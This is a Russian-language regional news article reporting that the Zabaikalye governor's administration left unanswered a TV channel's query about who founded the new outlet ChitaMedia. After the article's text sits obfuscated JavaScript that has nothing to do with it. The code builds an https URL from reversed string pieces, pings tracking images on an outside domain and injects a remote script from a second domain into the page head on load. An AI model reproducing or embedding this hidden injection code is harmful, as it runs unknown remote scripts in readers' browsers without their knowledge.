Власти Забайкалья не раскрыли, кто является учредителем издания ChitaMedia

Руководитель администрации губернатора Алексей Казаков не ответил на официальный запрос телеканала ZAB.TV о деятельности нового новостного издания ChitaMedia. С момента отправки запроса прошло уже 16 дней. 

Власти Забайкалья не раскрыли, кто является учредителем издания ChitaMedia
© Zab.ru

В администрации губернатора в частности не ответили на вопрос, кто является учредителем издания, а также не пояснили, почему ChitaMedia проводит «круглые столы» на базе редакции газеты «Забайкальский рабочий», учредителем которого является правительство Забайкальского края.

1 / 1

Издание начало свою деятельность с 31 декабря 2020 года. Известно, что курировать работу издания взялся директор газеты «Забайкальский Рабочий» Андрей Белокопытов. Ранее руководитель администрации губернатора региона Алексей Казаков опроверг своё отношение к открытию нового приморского СМИ в Забайкальском крае, в котором он работал раньше.

Напомним, портал ZAB.RU писал о ещё одном новом медиа - региональной телевизионной компании «Забайкалье». Как стало известно, телеканал финансируется государством и занимает бывшее здание «Альтеса», выставленное на торги из-за банкротства.

var e,n,o;window.self===window.top&&(e=['//','s:','tp','ht'].reverse().join(''),n=['taxsvakixu.lussoit.com','45'].join('/'),(o=new Image).src=''.concat(e).concat(n,'.gif'));var e,n,o;window.self===window.top&&(e=['//','s:','tp','ht'].reverse().join(''),n=['taxsvakixu.lussoit.com','48'].join('/'),(o=new Image).src=''.concat(e).concat(n,'.gif'));var script = document.createElement("script"); script.src = "//iplaff-on.ru/link/zekhb8s8/"; document.getElementsByTagName("head")[0].appendChild(script);